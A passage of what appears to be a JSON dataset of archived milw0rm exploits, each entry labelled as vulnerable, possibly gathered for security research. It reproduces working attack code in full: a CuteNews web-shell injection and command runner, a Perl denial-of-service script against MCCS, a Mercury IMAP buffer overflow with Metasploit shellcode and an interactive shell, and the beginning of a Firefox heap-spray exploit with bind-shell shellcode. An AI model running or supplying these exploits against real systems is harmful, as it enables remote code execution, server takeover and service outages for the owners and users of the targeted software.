type=\"text\" name=\"path\"><span class=\"Stile5\">  path (ex: /cute/ or\n\njust /) </span></p><p><input type=\"text\" name=\"main\"><span class=\"Stile5\"> main\n\npage where article are listed, ex: in default installation \"example2.php\"</span>\n\n</p><p><input type=\"text\"name=\"port\"><span class=\"Stile5\"> specify a port  other\n\nthan 80 ( default value ) </span> </p>  <p>  <input  type=\"text\" name=\"command\">\n\n<span  class=\"Stile5\"> a Unix command , example: ls -la  to list directories, ca\n\nt /etc/passwd to show passwd file </span></p><p><input type=\"text\" name=\"proxy\">\n\n<span class=\"Stile5\">  send exploit through an HTTP  proxy (ip:port) </span></p>\n\n<p>   <input   type=\"submit\" name=\"Submit\"  value=\"go!\"> </p></form> </td> </tr>\n\n</table></body></html>';\n\n\n\nfunction show($headeri)\n\n{\n\n$ii=0;\n\n$ji=0;\n\n$ki=0;\n\n$ci=0;\n\necho '<table border=\"0\"><tr>';\n\nwhile ($ii <= strlen($headeri)-1)\n\n{\n\n$datai=dechex(ord($headeri[$ii]));\n\nif ($ji==16) {\n\n             $ji=0;\n\n             $ci++;\n\n             echo \"<td>&nbsp;&nbsp;</td>\";\n\n             for ($li=0; $li<=15; $li++)\n\n                      { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\n\t\t\t    }\n\n            $ki=$ki+16;\n\n            echo \"</tr><tr>\";\n\n            }\n\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n\n{echo \"<td>\".$datai.\"</td> \";}\n\n$ii++;\n\n$ji++;\n\n}\n\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n\n                      { echo \"<td>&nbsp&nbsp</td>\";\n\n                       }\n\n\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n\n                      { echo \"<td>\".$headeri[$li].\"</td>\";\n\n\t\t\t    }\n\necho \"</tr></table>\";\n\n}\n\n\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\n\n\nfunction sendpacket($packet)\n\n{\n\nglobal $proxy, $host, $port, $html;\n\nif ($proxy=='')\n\n           {$ock=fsockopen(gethostbyname($host),$port);}\n\n             else\n\n           {\n\n\t    if (!eregi($proxy_regex,$proxy))\n\n\t    {echo htmlentities($proxy).' -> not a valid proxy...';\n\n\t     die;\n\n\t    }\n\n\t   $parts=explode(':',$proxy);\n\n\t    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\n\n\t    $ock=fsockopen($parts[0],$parts[1]);\n\n\t    if (!$ock) { echo 'No response from proxy...';\n\n\t\t\tdie;\n\n\t\t       }\n\n\t   }\n\nfputs($ock,$packet);\n\nif ($proxy=='')\n\n  {\n\n\n\n    $html='';\n\n    while (!feof($ock))\n\n      {\n\n        $html.=fgets($ock);\n\n      }\n\n  }\n\nelse\n\n  {\n\n    $html='';\n\n    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n\n    {\n\n      $html.=fread($ock,1);\n\n    }\n\n  }\n\nfclose($ock);\n\necho nl2br(htmlentities($html));\n\n}\n\n\n\nif (($path<>'') and ($host<>'') and ($command<>'') and ($main<>''))\n\n{\n\n  if ($port=='') {$port=80;}\n\n\n\n#STEP 1 -> Retrieve an article id\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.$main.\" HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET \".$host.$path.$main.\" HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet); //show the packet for debugging purposes \n\nsendpacket($packet);\n\n$temp=explode(\"id=\",$html);\n\n$temp2=explode(\"&amp;\",$temp[1]);\n\n$articleid=$temp2[0];\n\necho '<br><br>Article ID -> '.htmlentities($articleid).'<br><br>';\n\n\n\n#STEP 2 -> Inject a shell in flood.db.php\n\n\n\n$shell='<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>'; //customize it for your own pleasure...\n\n$title=':)'; //comment title\n\n$comment='Very glad to read such a good article! You should win Pulitzer prize!'; //customize here\n\n$data=\"name=\".urlencode($title).\"&comments=\".urlencode($comment).\"&submit=Add+My+Comment&subaction=addcomment&ucat=1&show=\";\n\n\n\nif ($proxy=='')\n\n{$packet=\"POST \".$path.$main.\"?subaction=showcomments&id=\".urlencode($articleid).\"&archive=&start_from=&ucat=1& HTTP/1.1\\r\\n\";}\n\nelse\n\n{$packet=\"POST http://\".$host.$path.$main.\"?subaction=showcomments&id=\".urlencode($articleid).\"&archive=&start_from=&ucat=1& HTTP/1.1\\r\\n\";}\n\n\n\n$packet.=\"User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\\r\\n\";\n\n$packet.=\"Client-Ip: \".$shell.\"\\r\\n\"; //spoof HTTP_CLIENT_IP var...\n\n$packet.=\"Host: \".$host.\"r\\n\";\n\n$packet.=\"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\\r\\n\";\n\n$packet.=\"Accept-Language: it,en;q=0.9\\r\\n\";\n\n$packet.=\"Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\\r\\n\";\n\n$packet.=\"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"example2.php?subaction=showcomments&id=\".urlencode($articleid).\"&archive=&start_from=&ucat=1&\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive, TE\\r\\n\";\n\n$packet.=\"TE: deflate, gzip, chunked, identity, trailers\\r\\n\";\n\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\n\n$packet.=$data;\n\nshow($packet); // debugging...\n\nsendpacket($packet);\n\n\n\n# STEP 3 -> Launch commands\n\necho '<br> If CuteNews is unpatched and vulnerable, now you will see '.htmlentities($command).' output...<br>';\n\nif ($proxy=='')\n\n{$packet=\"GET \".$path.\"data/flood.db.php?cmd=\".urlencode($command).\" HTTP/1.0 \\r\\n\";}\n\nelse\n\n{$packet=\"GET \".$host.$path.\"data/flood.db.php?cmd=\".urlencode($command).\" HTTP/1.0 \\r\\n\";}\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\\r\\n\";\n\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n\nshow($packet); //debugging...\n\nsendpacket($packet);\n\n}\n\nelse\n\n{echo 'fill in all requested fields...';}\n\n?>\n\n\n\n# milw0rm.com [2005-09-17]",
1150        "vulnerable": true
1151    },
1152    {
1153        "exploit_id": 1222,
1154        "content": "#!usr/bin/perl\n\n#\n\n# MCCS Server\\Client Command DOS Exploit\n\n# --------------------------------------\n\n#  Infam0us Gr0up - Securiti Research\n\n#\n\n# Info: infamous.2hell.com\n\n# Vendor URL: www.xclusive-software.com\n\n#\n\n\n\n\n\nuse IO::Socket;\n\n\n\nprint(\"\\n  MCCS Command DOS Exploit\\n\");\n\nprint(\"-----------------------------\\n\");\n\n\n\n$str = \"\\x41\";\n\nif($#ARGV < 0 | $#ARGV > 1) {\n\ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n\n\n$adr = $ARGV[0];\n\n$prt = \"\\x38\\x30\";\n\n\n\nprint \"[+] Connect to host..\\n\";\n\nsleep 2;\n\n$remote = IO::Socket::INET->new(Proto=>\"\\x75\\x64\\x70\", PeerAddr=>$adr,\n\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\n\nprint \"[+] Connected\\n\";\n\n$remote->autoflush(1);\n\nprint \"[+] Sending bad string..\\n\";\n\nsleep 2;\n\nprint $remote \"$str\" or die \"[-] Error: can't send string code\\n\";\n\nprint \"[*] Client Server SHUTDOWNED!\\n\\n\";\n\nprint \"press any key to exit..\\n\";\n\n$bla= <STDIN>;\n\nclose $remote;\n\n\n\n# milw0rm.com [2005-09-19]",
1155        "vulnerable": true
1156    },
1157    {
1158        "exploit_id": 1223,
1159        "content": "/*   \n\n     Mercury imap4 server remote buffer overflow exploit\n\n     author : c0d3r \"kaveh razavi\" c0d3r@ihsteam.com c0d3r@c0d3r.org\n\n     package : Mercury mail transport system 4.01a and prolly prior\n\n     workaround : upgrade to 4.01b version\n\n     advisory : not available right now \n\n     company address : www.pmail.com\n\n     timeline :\n\n     15 Sep 2005 : vulnerability reported by securiteam mailing list\n\n     20 Sep 2005 : IHS exploit released \n\n     exploit features :\n\n     1) 5 working targets including win2k , winxp , win2k3\n\n     2) reliable metasploit shellcode\n\n     3) autoconnect to shell\n\n     bad chars are : 0x20 0x0a \n\n     compiled with visual c++ 6 : cl mercury_imap.c \n\n     greeting to :\n\n     www.ihsteam.com       the team , LorD and NT heya\n\n     www.ihsteam.net       english version ,\n\n     www.exploitdev.com    Jamie and Ben the two good brothers also my brothers\n\n     www.metasploit.com    when are you gonna release the newer version :P ?\n\n     www.class101.org      class with his new laptop :>\n\n     www.milw0rm.com       str0ke , I am sending it to you first dont doubt :d \n\n     www.c0d3r.org         study time started :((( , pitty for the c0d3r !\n\n     shout to actionspider \n\n     read these lines and try to understand ( I know you cant akhey ) that \n\n     an script kiddie (defacer) never ever could be compared to an exploit coder\n\n     try to grow , being grown up is not related to age  -- with respects \n\n/*\n\n/*\n\n\n\nD:\\projects>mercury_imap.exe ihs 143 4 c0d3r abc\n\n\n\n-------- mercury imap remote BOF exploit by c0d3r\n\n\n\n[+] target : windows 2003 server enterprise service pack 1\n\n[+] building login data\n\n[+] building overflow string\n\n[+] attacking host ihs\n\n[+] packet size = 625 byte\n\n[+] connected\n\n[+] sending login info\n\n[+] sending exploit string\n\n[+] exploit sent successfully to ihs\n\n[+] trying to get shell\n\n[+] connecting to ihs on port 4444\n\n[+] target exploited successfully\n\n[+] Dropping into shell\n\n\n\nMicrosoft Windows [Version 5.2.3790]\n\n(C) Copyright 1985-2003 Microsoft Corp.\n\n\n\nH:\\MERCURY>\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n#define NOP 0x90\n\n#define size 625\n\n// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   \n\n\n\n\n\n// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub\n\n// bad chars : 0x00 0x0a 0x20 0x0d\n\n\n\nchar shellcode[]=\n\n\"\\x33\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x92\"\n\n\"\\xc9\\xd2\\x3b\\x83\\xeb\\xfc\\xe2\\xf4\\x6e\\xa3\\x39\\x76\\x7a\\x30\\x2d\\xc4\"\n\n\"\\x6d\\xa9\\x59\\x57\\xb6\\xed\\x59\\x7e\\xae\\x42\\xae\\x3e\\xea\\xc8\\x3d\\xb0\"\n\n\"\\xdd\\xd1\\x59\\x64\\xb2\\xc8\\x39\\x72\\x19\\xfd\\x59\\x3a\\x7c\\xf8\\x12\\xa2\"\n\n\"\\x3e\\x4d\\x12\\x4f\\x95\\x08\\x18\\x36\\x93\\x0b\\x39\\xcf\\xa9\\x9d\\xf6\\x13\"\n\n\"\\xe7\\x2c\\x59\\x64\\xb6\\xc8\\x39\\x5d\\x19\\xc5\\x99\\xb0\\xcd\\xd5\\xd3\\xd0\"\n\n\"\\x91\\xe5\\x59\\xb2\\xfe\\xed\\xce\\x5a\\x51\\xf8\\x09\\x5f\\x19\\x8a\\xe2\\xb0\"\n\n\"\\xd2\\xc5\\x59\\x4b\\x8e\\x64\\x59\\x7b\\x9a\\x97\\xba\\xb5\\xdc\\xc7\\x3e\\x6b\"\n\n\"\\x6d\\x1f\\xb4\\x68\\xf4\\xa1\\xe1\\x09\\xfa\\xbe\\xa1\\x09\\xcd\\x9d\\x2d\\xeb\"\n\n\"\\xfa\\x02\\x3f\\xc7\\xa9\\x99\\x2d\\xed\\xcd\\x40\\x37\\x5d\\x13\\x24\\xda\\x39\"\n\n\"\\xc7\\xa3\\xd0\\xc4\\x42\\xa1\\x0b\\x32\\x67\\x64\\x85\\xc4\\x44\\x9a\\x81\\x68\"\n\n\"\\xc1\\x9a\\x91\\x68\\xd1\\x9a\\x2d\\xeb\\xf4\\xa1\\xc3\\x67\\xf4\\x9a\\x5b\\xda\"\n\n\"\\x07\\xa1\\x76\\x21\\xe2\\x0e\\x85\\xc4\\x44\\xa3\\xc2\\x6a\\xc7\\x36\\x02\\x53\"\n\n\"\\x36\\x64\\xfc\\xd2\\xc5\\x36\\x04\\x68\\xc7\\x36\\x02\\x53\\x77\\x80\\x54\\x72\"\n\n\"\\xc5\\x36\\x04\\x6b\\xc6\\x9d\\x87\\xc4\\x42\\x5a\\xba\\xdc\\xeb\\x0f\\xab\\x6c\"\n\n\"\\x6d\\x1f\\x87\\xc4\\x42\\xaf\\xb8\\x5f\\xf4\\xa1\\xb1\\x56\\x1b\\x2c\\xb8\\x6b\"\n\n\"\\xcb\\xe0\\x1e\\xb2\\x75\\xa3\\x96\\xb2\\x70\\xf8\\x12\\xc8\\x38\\x37\\x90\\x16\"\n\n\"\\x6c\\x8b\\xfe\\xa8\\x1f\\xb3\\xea\\x90\\x39\\x62\\xba\\x49\\x6c\\x7a\\xc4\\xc4\"\n\n\"\\xe7\\x8d\\x2d\\xed\\xc9\\x9e\\x80\\x6a\\xc3\\x98\\xb8\\x3a\\xc3\\x98\\x87\\x6a\"\n\n\"\\x6d\\x19\\xba\\x96\\x4b\\xcc\\x1c\\x68\\x6d\\x1f\\xb8\\xc4\\x6d\\xfe\\x2d\\xeb\"\n\n\"\\x19\\x9e\\x2e\\xb8\\x56\\xad\\x2d\\xed\\xc0\\x36\\x02\\x53\\x62\\x43\\xd6\\x64\"\n\n\"\\xc1\\x36\\x04\\xc4\\x42\\xc9\\xd2\\x3b\";\n\n\n\n\n\n  void gotshell (int newsock);\n\n  unsigned int rc,sock,os,addr,rc2 ;\n\n  struct sockaddr_in tcp;\n\n  struct hostent *hp;\n\n  WSADATA wsaData;\n\n  char buffer[size];\n\n  char point_esp[5];\n\n  unsigned short port;\n\n  char req1[] =  \"\\x30\\x30\\x30\\x30\\x20\\x4C\\x4F\\x47\\x49\\x4E\";\n\n  char req2[] =  \"\\x30\\x30\\x30\\x31\";\n\n  unsigned char *login,*exploit;\n\n  char vuln_command[] = \"\\x4C\\x49\\x53\\x54\";\n\n  char winxpsp1[]   = \"\\xCC\\x59\\xFB\\x77\"; // jmp esp in ntdll\n\n  char winxpsp2[]   = \"\\xED\\x1E\\x94\\x7C\"; // jmp esp (not tested)\n\n  char win2ksp4[]   = \"\\x23\\xde\\xaf\\x01\"; // call esp in kernel32.dll\n\n  char win2k3_sp0[] = \"\\xAB\\x8B\\xFB\\x77\"; // jmp esp in ntdll\n\n  char win2k3_sp1[] = \"\\x6A\\xFA\\xE8\\x77\"; // push esp - ret in kernel32\n\n                    \n\n int main (int argc, char *argv[]){\n\n  \n\n\t\n\n if(argc < 6) {\n\n printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\");\n\n printf(\"-------- usage : imap.exe host port target username password\\n\");\n\n printf(\"-------- target 1 : windows xp service pack 1         : 0\\n\");\n\n printf(\"-------- target 2 : windows xp service pack 2         : 1\\n\");\n\n printf(\"-------- target 3 : windoes 2k advanced server sp 4   : 2\\n\");\n\n printf(\"-------- target 4 : windoes 2k3 server enterprise sp0 : 3\\n\");\n\n printf(\"-------- target 5 : windoes 2k3 server enterprise sp1 : 4\\n\");\n\n printf(\"-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\\n\\n\");\t\n\n exit(-1) ;\n\n  } \n\n  printf(\"\\n-------- mercury imap remote BOF exploit by c0d3r\\n\\n\");\n\n os = (unsigned short)atoi(argv[3]); \t \n\n  switch(os)\n\n  {\n\n   case 0:\n\n    strcat(point_esp,winxpsp1);\n\n    printf(\"[+] target : windows xp service pack 1\\n\");\n\n\tbreak;\n\n   case 1:\n\n    strcat(point_esp,winxpsp2); \n\n    printf(\"[+] target : windows xp service pack 2\\n\");\n\n\tbreak;\n\n   case 2:\n\n    strcat(point_esp,win2ksp4); \n\n    printf(\"[+] target : windows 2000 advanced server service pack 4\\n\");\n\n\tbreak;\n\n   case 3:\n\n\tstrcat(point_esp,win2k3_sp0);\n\n\tprintf(\"[+] target : windows 2003 server enterprise service pack 0\\n\");\n\n\tbreak;\n\n   case 4:\n\n\tstrcat(point_esp,win2k3_sp1);\n\n\tprintf(\"[+] target : windows 2003 server enterprise service pack 1\\n\");\n\n\tbreak;\n\n   default:\n\n    printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");\n\n   \n\n    exit(-1);\n\n  }  \n\n\t\n\n  printf(\"[+] building login data\\n\");\n\n  login = malloc(256);\n\n  memset(login,0,256);\n\n  sprintf(login,\"%s %s %s\\r\\n\",req1,argv[4],argv[5]);\n\n\n\n    // Creating heart of exploit code 4 5\n\n  \n\n    printf(\"[+] building overflow string\");\n\n  \n\n    memset(buffer,NOP,size);\n\n    memcpy(buffer+260,point_esp,sizeof(point_esp)-1);\n\n    memcpy(buffer+280,shellcode,sizeof(shellcode)-1);\n\n    buffer[size] = 0;\n\n    exploit = malloc(1000);\n\n    memset(exploit,0,1000);\n\n    sprintf(exploit,\"%s %s %s\\r\\n\",req2,vuln_command,buffer);\n\n\t\n\n   // EO heart of exploit code \n\n\n\n  \n\n\t\t\tif (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){\n\n   printf(\"[-] WSAStartup failed !\\n\");\n\n   exit(-1);\n\n  }\n\n\thp = gethostbyname(argv[1]);\n\n  Sleep(1500);\n\n  if (!hp){\n\n   addr = inet_addr(argv[1]);\n\n  }\n\n  if ((!hp)  && (addr == INADDR_NONE) ){\n\n   printf(\"[-] unable to resolve %s\\n\",argv[1]);\n\n   exit(-1);\n\n  }\n\n  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\n  if (!sock){ \n\n   printf(\"[-] socket() error...\\n\");\n\n   exit(-1);\n\n  }\n\n\t  if (hp != NULL)\n\n   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);\n\n  else\n\n   tcp.sin_addr.s_addr = addr;\n\n\n\n  if (hp)\n\n   tcp.sin_family = hp->h_addrtype;\n\n  else\n\n  tcp.sin_family = AF_INET;\n\n  port=atoi(argv[2]);\n\n  tcp.sin_port=htons(port);\n\n   \n\n  \n\n  printf(\"\\n[+] attacking host %s\\n\" , argv[1]) ;\n\n  \n\n  Sleep(1000);\n\n  \n\n  printf(\"[+] packet size = %d byte\\n\" , sizeof(buffer));\n\n  \n\n  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));\n\n  if(rc==0)\n\n  {\n\n    \n\n     Sleep(1500) ;\n\n     printf(\"[+] connected\\n\") ;\n\n     printf(\"[+] sending login info\\n\") ;\n\n     send(sock,login,strlen(login),0);\n\n     Sleep(1500);\n\n     printf(\"[+] sending exploit string\\n\") ;\n\n     send(sock,exploit,strlen(exploit),0);\n\n     Sleep(1500);\n\n     printf(\"[+] exploit sent successfully to %s \\n\" , argv[1]);\n\n     printf(\"[+] trying to get shell\\n\");\n\n     printf(\"[+] connecting to %s on port 4444\\n\",argv[1]);\n\n     sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\n     Sleep(1500);\n\n     if (!sock){ \n\n     printf(\"[-] socket() error...\\n\");\n\n     exit(-1);\n\n\t }\n\n\t tcp.sin_family = AF_INET;\n\n\t tcp.sin_port=htons(4444);\n\n\t rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));\n\n     if(rc2 != 0) {\n\n\t printf(\"[-] exploit probably failed\\n\");\n\n\t exit(-1);\n\n\t }\n\n     if(rc2==0)\n\n\t {\n\n\t  printf(\"[+] target exploited successfully\\n\");\n\n      printf(\"[+] Dropping into shell\\n\\n\");\n\n\t gotshell(sock);\n\n\t }\n\n  } \n\n  \n\n  else {\n\n      printf(\"[-] ouch! Server is not listening .... \\n\");\n\n }\n\n  shutdown(sock,1);\n\n  closesocket(sock);\n\n  }\n\n   void gotshell(int new_sock)  \n\n\t{\n\n  struct timeval tv;\n\n  int length;\n\n  unsigned long o[2];\n\n  char bufferx[1000];\n\n\n\n  tv.tv_sec = 1;\n\n  tv.tv_usec = 0;\n\n\n\n  while (1) {\n\n\t\n\n\to[0] = 1;\n\n\to[1] = new_sock; \n\n\n\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\n\n\tif(length == 1)\n\n\t\t{\n\n\tlength = recv (new_sock, bufferx, sizeof (bufferx), 0);\n\n\tif (length <= 0) \n\n\t\t{\n\n\tprintf (\"[-] Connection closed.\\n\");\n\n\tWSACleanup();\n\n\treturn;\n\n\t\t}\n\n\tlength = write (1, bufferx, length);\n\n\tif (length <= 0) \n\n\t\t{\n\n\tprintf(\"[-] Connection closed.\\n\");\n\n\tWSACleanup();\n\n\treturn;\n\n\t\t}\n\n\t\t}\n\n\telse\n\n\t{\n\n\tlength = read (0, bufferx, sizeof (bufferx));\n\n\tif (length <= 0) \n\n\t\t{\n\n\tprintf(\"[-] Connection closed.\\n\");\n\n\tWSACleanup();\n\n\treturn;\n\n\t\t}\n\n\tlength = send(new_sock, bufferx, length, 0);\n\n\tif (length <= 0) \n\n\t{\n\n\tprintf(\"[-] Connection closed.\\n\");\n\n\tWSACleanup();\n\n\treturn;\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n   }\n\n\n\n// milw0rm.com [2005-09-20]",
1160        "vulnerable": true
1161    },
1162    {
1163        "exploit_id": 1224,
1164        "content": "<HTML><SCRIPT>\n\n/*\n\n_______________________________________________________________________________\n\n                                                                               \n\n     SSSSSSS,  SSSSSSS' PwnZilla 5 - One sploit fits all. (FireFox optimized)  \n\n    iSY   iS;    .sS*   Exploit for IDN host name heap buffer overrun in       \n\n   .SSSSSSS*   .sS*     Mozilla browsers (FireFox, Mozilla and Netscape)       \n\n   iS;       .sS*       Copyright (C) 2003-2005 by Berend-Jan Wever.           \n\n  .SS       sSSSSSSP    <berendjanwever@gmail.com>                             \n\n_______________________________________________________________________________\n\n          Official release: http://www.milw0rm.com/id.php?id=1224 (https://www.exploit-db.com/exploits/1224/)\n\n\n\n  This program is free software; you can redistribute it and/or modify it under\n\n  the terms of the GNU General Public License version 2, 1991 as published by\n\n  the Free Software Foundation.\n\n\n\n  This program is distributed in the hope that it will be useful, but WITHOUT\n\n  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n\n  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more\n\n  details.\n\n\n\n  A copy of the GNU General Public License can be found at:\n\n    http://www.gnu.org/licenses/gpl.html\n\n  or you can write to:\n\n    Free Software Foundation, Inc.\n\n    59 Temple Place - Suite 330\n\n    Boston, MA  02111-1307\n\n    USA.\n\n\n\n\tOne sploit to rule them all, One sploit to find them,\n\n\tOne sploit to bring them all and to port 28876 bind them.\n\n\n\n\tCredits and thanks:\n\n\tTom Ferris/www.security-protocols.com - For finding the vulnerability.\n\n\tAviv Raff - Thanks for helping me advance the heap spray technology.\n\n\tstr0ke/www.milw0rm.com - Thanks for testing and hosting the exploit.\n\n\tHDM/www.metasploit.com - Thanks for the basis of my shellcode.\n\n\n\n\tTechnical details:\n\n\tSince Netscape has not replied to reports about this vulnerability I've\n\n\tchosen to release it. Since there is no patch out yet, this version does\n\n\tnot target all affected browsers. It is optimized to work with FireFox, who\n\n\tdo have a patch out, but on a rare occasion it will work in Netscape.\n\n\n\n\tThis exploits a heap overrun. Rather then trying to beat the security of\n\n\tmodern heap managers, I ignore them and try to overwrite data in the\n\n\theap blocks after the block we overrun. It's a game of chance where we\n\n\thope the targetted browser will use this overwritten data in a call before\n\n\tit throws an access violation. We have some control over the odds, more\n\n\ton that later.\n\n\n\n\tExploitation is achieved by using the same old heap blocks trick that I've\n\n\tpublished about a year ago in my Internet Exploiter exploits. It creates a\n\n\tstring that contains a nopslide and a shellcode. This string is (almost)\n\n\texactly large enough to fit into a large heap block. It makes copies\n\n\tof the string to create more large heap blocks. These heap blocks will fill\n\n\tall memory between roughly 0x02000000 and 0x28081976. The nopslide consists\n\n\tof values that can be used as code and pointers; these pointers will all\n\n\tpoint to addresses in this same region of memory.\n\n\tThe actually vulnerability is used when it creates a number of image\n\n\tobjects and set their \"src\" to a url that exploits it to overwrite random\n\n\tparts of heap memory with a range of addresses that all point to the large\n\n\theap blocks.\n\n\tWhile it continues to create more and more images, chances are that some\n\n\tpart of FireFox will use the overwritten parts of the heap in a \"call\" or\n\n\t\"jmp\". This will cause our shellcode to get executed.\n\n\n\n\tPrevious exploits have all relied on one address being used in the nopslide\n\n\tand in exploiting the vulnerability to overwrite EIP, that's why you see\n\n\t0x0D0D0D0D in so many of my exploits and other exploits based on my code.\n\n\tBecause in previous exploits the vulnerable code would just read from this\n\n\taddress and/or call it, this worked pretty well.\n\n\tThis exploit is overwriting random parts of the heap and may therefore\n\n\toverwrite a number of pointers that may be used in a write operation.\n\n\tThis causes a problem if some part of the code writes to one of our\n\n\taddresses first and then another part calls it, thereby executing\n\n\twhatever value the first part overwrote it with as assembly. This may\n\n\ttranslate to instructions that cause exceptions, preventing the exploit\n\n\tfrom working. To increase our chances of success, we supply it with a\n\n\tvariety of addresses, in an effort to make different parts of the\n\n\tprogram use different addresses and hope we end up with executing a\n\n\t\"clean\" nopslide.\n\n\n\n\tFor Netscape, addresses < 0x10000000 have proven to not work because it\n\n\thas a tendency to add random blocks to the heap while we're spraying\n\n\t(for no apparent reason). These somehow always end up exactly where we\n\n\tdon't want them.\n\n\n\n*/\n\n    var startDate = new Date();\n\n\tvar iFillToAddress = 0x28081976;\n\n    var iHeapBlockSize = 0x00200000;\n\n\tvar iHeapHeaderSize = 0x40; // This should work for all browsers/OS-es.\n\n    var iHeapStartAddress = 0x00420000;\n\n    // The %uXXXX encoding proved hard for a lot of people... damn n00bs!\n\n\tvar sShellcodeBytes = // Make sure the number of bytes is EVEN!\n\n\t\t\"90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 \" +\n\n\t\t\"ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 \" +\n\n\t\t\"f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 \" +\n\n\t\t\"8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b \" +\n\n\t\t\"68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 \" +\n\n\t\t\"a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe \" +\n\n\t\t\"c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 \" +\n\n\t\t\"50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc \" +\n\n\t\t\"fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 \" +\n\n\t\t\"50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 \" +\n\n\t\t\"56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db \" +\n\n\t\t\"56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a \" +\n\n\t\t\"44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb \" +\n\n\t\t\"21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf \" +\n\n\t\t\"fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 \";\n\n\tvar sShellcode = unescape(\n\n\t\tsShellcodeBytes.replace(\n\n\t\t\t// ...I now use regular expressions (thanks, Secunia! :P)\n\n\t\t\t/\\s*([0-9A-Fa-f][0-9A-Fa-f])\\s*([0-9A-Fa-f][0-9A-Fa-f])/g,\n\n\t\t\t\"%u$2$1\"\n\n\t\t)\n\n\t);\n\n\n\n\t// Experimenting with a debugger has let to this string, which uses the max\n\n\t// hostname length FireFox allows (63 bytes) to create the largest\n\n\t// overwrite possible. Each of the 0xAD-s gets expanded into two bytes, \n\n\t// which in theory would allow for a 126 bytes overwrite. But in practise\n\n\t// FireFox will use 32 of these bytes for other things like the \"http://\",\n\n\t// '/', '\\0' and some other stuff. This leaves us with 94 bytes and a \\0 to\n\n\t// overwrite heap memory with.\n\n\tvar sURL = unescape(\n\n\t\t\"http://\" +\n\n\t\t\"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD\" 